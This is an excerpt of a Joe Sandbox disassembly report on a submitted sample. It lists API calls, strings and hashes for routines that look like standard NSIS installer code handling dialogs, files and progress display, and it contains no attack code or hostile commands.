                                                  • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                  • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                  • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                  • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                    • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                    • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                    • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                    • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                    • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: (7B$A
                                                  • API String ID: 2624150263-3645020878
                                                  • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                  • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                  • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                  • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                  • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                  • wsprintfA.USER32 ref: 004060B3
                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                    • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                  • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                  • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                  • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402F44
                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                    • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                  • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                  Strings
                                                  • Null, xrefs: 00403029
                                                  • soft, xrefs: 00403020
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                  • Error launching installer, xrefs: 00402F80
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                  • Inst, xrefs: 00403017
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-787788815
                                                  • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                  • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                  • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                  • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                  • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                  • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                  • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                  • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                  • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                  Strings
                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-730719616
                                                  • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                  • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                  • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                  • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                  • GetSysColor.USER32(00000000), ref: 00404421
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                  • SetBkMode.GDI32(?,?), ref: 00404439
                                                  • GetSysColor.USER32(?), ref: 0040444C
                                                  • SetBkColor.GDI32(?,?), ref: 0040445C
                                                  • DeleteObject.GDI32(?), ref: 00404476
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                  • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                  • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                    • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                  • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                  • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                  • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                  • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                  • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                  • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                  • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                  • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                  • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                  APIs
                                                  • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                  • GetTickCount.KERNEL32 ref: 00402EC7
                                                  • wsprintfW.USER32 ref: 00402EF5
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                    • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                  • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                  • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                  • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                  • GetMessagePos.USER32 ref: 00404D3D
                                                  • ScreenToClient.USER32(?,?), ref: 00404D57
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                  • wsprintfW.USER32 ref: 004067A4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                  • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                  • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                  • wsprintfW.USER32 ref: 00402E45
                                                  • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                  • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                  • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                  • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                  • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                  • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                  • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                  APIs
                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                  • wsprintfW.USER32 ref: 00404CB6
                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$(7B
                                                  • API String ID: 3540041739-1320723960
                                                  • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                  • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                  • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                  • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                  • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                  • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
